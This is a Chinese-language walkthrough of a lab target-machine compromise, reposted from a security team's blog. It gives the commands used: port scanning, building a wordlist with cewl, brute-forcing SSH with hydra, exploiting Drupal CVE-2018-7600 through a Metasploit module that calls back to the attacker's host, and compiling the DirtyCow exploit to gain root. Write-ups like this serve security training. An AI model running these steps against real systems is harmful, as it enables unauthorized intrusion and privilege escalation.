文章总结: 本文记录了一次完整的靶机渗透测试过程,从端口扫描发现Drupal7.54系统开始,通过信息收集获得账号密码,利用CVE-2018-7600漏洞获取初始权限,最后使用DirtyCow提权漏洞成功获取root权限。文章详细展示了渗透测试各阶段的具体操作命令和方法,具有较高的实战参考价值。 综合评分: 82 文章分类: 渗透测试,WEB安全,漏洞分析,实战经验,红队
记一次简单的靶机提权过程
原创
L×K@y L×K@y
Quest安全团队
2026年6月13日 10:37 北京
在小说阅读器读本章
去阅读
靶机:192.168.13.124
直接扫描端口
nmap 192.168.13.124 -p-
发现22,80,1898端口,尝试访问一下80端口,什么信息都没有
再访问一下1898,发现登录框
探测一下接口
尝试访问,发现/node/2有信息
有两个文件,访问一下
音频是账号
tiago
二维码是
Try harder! muahuahua
二维码信息目前不知道有什么用
继续信息收集,爆破一下目录
看看robots.txt
暴露了一些目录,尝试访问
Drupal 7.54 是 Drupal 7 系列的一个官方核心版本,于 2017年2月1日 发布。简单来说,你可以把它理解为一套内容管理系统(CMS,即Content Management System)的“小版本更新包”。
用cewl创建一个和网站关键信息相关的字典
cewl http://192.168.13.124:1898/?q=node/1 -w zidain.txt
之后九头蛇爆爆破
hydra -l tiago -P zidian.txt ssh://192.168.13.124
账户: tiago,密码: Virgulino
连接一下
id看了一下是个普通用户,需要提权
前几步是发现Drupal 7.54,查询一下历史漏洞
CVE-2018-7600
msf启动,搜索漏洞模块
msfconsolesearch Drupal
msf跑一下
use exploit/unix/webapp/drupal_drupalgeddon2 # 使用模块set RHOST 192.168.13.124 # 设置你的靶机 IPset RPORT 1898 # 设置 Drupal 服务的端口set LHOST <攻击机 IP> # 设置你的攻击机 IPrun
下一步获取稳定shell
shellpython -c 'import pty; pty.spawn("/bin/bash")'
之后利用漏洞继续提权
searchsploit dirty
找一下利用利用脚本
之后下载到靶机上
直接用moba拖进去了g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dayu 40847.cpp -lutil./dayu
这样就得到了root账户密码,提权成功
登录root账户就能得到flag
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Quest安全团队 L×K@y L×K@y《记一次简单的靶机提权过程》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论